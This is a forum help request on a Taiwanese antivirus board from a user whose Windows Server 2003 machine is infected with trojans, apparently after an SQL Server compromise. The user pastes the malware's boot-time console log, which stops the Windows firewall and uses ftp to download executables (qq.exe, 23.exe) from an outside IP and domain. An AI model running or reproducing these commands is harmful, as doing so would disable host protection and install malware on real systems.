[問題] Server2003中毒 (應該是SQL server被攻擊)
由於server2003能裝的防毒不多
我去抓nod32 可以裝 病毒碼無法更新 但是其他的電腦(XP)可以更新
後來改用線上trend micro 抓出3隻 (他不讓我執行第2次)
wsynllib.exe TROJ MSIL.JT
JITMTB~1 TROJ REDOSD.SMQ
sLib.exe TROJ GEN.R44C4DQ
為啥會發現中毒呢 那台server開機後會自己跑cmd 然後跑了這些
尚未啟動 Windows Firewall/Internet Connection Sharing (ICS) 服務。
詳細資料,請輸入 NET HELPMSG 3521。
ftp> open 127.meibu.com
> ftp: connect :拒絕連結
ftp> 123
Invalid command.
ftp> 123
Invalid command.
ftp> binary
Not connected.
ftp> get qq.exe
Not connected.
ftp> bye
ftp> open 127.meibu.com
(後面還有字串 抓不到 他執行完後自動關閉)
請問要如何不讓他開機執行那些呢
我看過msconfig 看不出異狀 (其實是看不出來)
--
目前用防毒軟體把檔案殺了 不過系統好像怪怪的
感覺應該沒有殺掉 重開機還有
而且像內建防火牆都打不開
msc的檔案也都變成沒權限開啟
不過我成功複製下CMD的指令了 然後我查過此IP是大陸的
此FTP裡 我發現裡面有些神奇的東西 我猜應該是SQL server被攻擊
-- 下面就是完整的 一開始就先幫你把防火牆關掉
Windows Firewall/Internet Connection Sharing (ICS) 服務正在停止.
Windows Firewall/Internet Connection Sharing (ICS) 服務已經成功停止。
ftp> open 125.208.9.3
Connected to 125.208.9.3.
Connection closed by remote host.
ftp> 123
Invalid command.
ftp> 123
Invalid command.
ftp> binary
Not connected.
ftp> get 23.exe
Not connected.
ftp> bye
ftp> open 125.208.9.3
Connected to 125.208.9.3.
421 Too many users are connected, please try again later.
User (125.208.9.3:(none)):
331 Password required for 123
230 Client :123 successfully logged in. Client IP :
ftp> binary
200 Type set to I
ftp> get 23.exe
200 Port command successful.
150 Opening BINARY mode data connection for file transfer.
※ 編輯: yuchia69 來自: 114.32.148.155 (05/12 14:31)
推
05/12 15:41, , 1F
05/12 15:41, 1F
→
05/12 17:13, , 2F
05/12 17:13, 2F
AntiVirus 近期熱門文章
PTT數位生活區 即時熱門文章
